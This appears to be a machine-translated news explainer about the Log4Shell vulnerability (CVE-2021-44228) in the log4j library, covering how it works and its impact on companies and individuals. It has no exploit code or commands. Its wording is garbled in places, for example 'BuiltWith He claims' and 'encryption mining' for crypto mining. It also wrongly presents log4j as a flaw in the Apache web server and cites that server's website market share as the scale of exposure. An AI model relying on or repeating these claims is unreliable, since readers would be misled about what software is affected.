A lot of cyber attacks are taking advantage of a dangerous flaw called log4shell in the log4j software . A senior US cybersecurity official was quoted in Cyberscoop saying that it is one of the most serious attacks of his career, “if not the most serious.” This is what makes it so bad and how it affects you.
What is Log4j?
The log4j error (also called the log4shell vulnerability and known by the number CVE-2021-44228 ) is a weakness in some of the most widely used web server software, Apache. The bug is in the open source log4j library, a collection of preset commands that programmers use to speed up their work and avoid having to repeat complicated code.
Libraries are the foundation of many, if not most, programs because they save a lot of time. Instead of having to write an entire block of code over and over for certain tasks, you just write a few commands that tell the program that they need to take something from a library. Think of them as shortcuts that you can put in your code.
However, if something goes wrong, like in the log4j library, that means that all programs that use that library will be affected. That would be serious in itself, but Apache runs on many servers, and we mean much . W3Techs estimates that 31.5 percent of websites use Apache and BuiltWith He claims to know more than 52 million sites that use it.
How the Log4j glitch works
It’s potentially a lot of servers that have this flaw, but it gets worse: how the log4j error works is that it can replace a single text string (one line of code) that causes you to load data from another computer on the internet.
A decent average hacker can feed the log4j library a line of code that instructs the server to collect data from another server, owned by the hacker. This data can be anything from a script that collects data on devices connected to the server, such as browser fingerprints , but even worse, or even take control of the server in question.
The only limit is the inventiveness of the hacker, the skill hardly comes into play because it is so easy. Up to now, according to Microsoft , the activities of hackers have included the encryption mining , data theft and server hijacking.
This fault is zero day , which means it was discovered and exploited before a patch to fix it was available.
We recommend the Malwarebytes blog version of log4j if you are interested in reading some more technical details.
Security impact of Log4j
The impact of this failure is massive – A third of the world’s servers are likely to be affected, including those of large corporations like Microsoft, as well as Apple’s iCloud and its 850 million users . The servers of the Steam gaming platform are also affected. Even Amazon has servers that run on Apache.
It’s not just the corporate bottom line that could be affected either – there are many smaller companies running Apache on their servers. The damage that a hacker could do to a system is bad enough for a multibillion dollar company, but a small one could disappear completely.
Also, because the glitch was widely publicized in an effort to get everyone to correct it, it has turned into something of a frenzy. In addition to the regular crypto miners trying to enslave new networks to speed up their operations, Russian and Chinese hackers are also joining in on the fun, according to several experts cited in the article. Financial times (our apologies for the paywall).
All anyone can do now is create patches that fix the bug and deploy them. However, experts are already saying that it will take years to fully patch all affected systems . Not only do cybersecurity professionals need to find out which systems have failed, they also need to run checks to see if the system has been breached and, if so, what the hackers did.
Even after the patch, there’s a chance that whatever the hackers left behind will still do its job, meaning the servers will need to be purged and reinstalled. It’s going to be a huge job and not one that can be done in one day.
How does Log4j affect you?
All of the above may seem like what can only be described as a cyber apocalypse, but so far we’ve only talked about companies, not people. That’s what most of the coverage has focused on. However, there is also a risk for normal people, even if they are not running a server.
As we mentioned, hackers have stolen data from some servers. If the company in question secured the data correctly, that shouldn’t be a big problem, because the attackers would still have to decrypt the files, which is not an easy task. However, if people’s data is incorrectly saved , then they made hackers’ day.
The data in question could be anything, in reality, such as usernames, passwords, or even your address and Internet activity; fortunately, credit card information is generally encrypted. Although it is too early to say now how bad it will be, it seems that very few people will be able to avoid the consequences of log4j.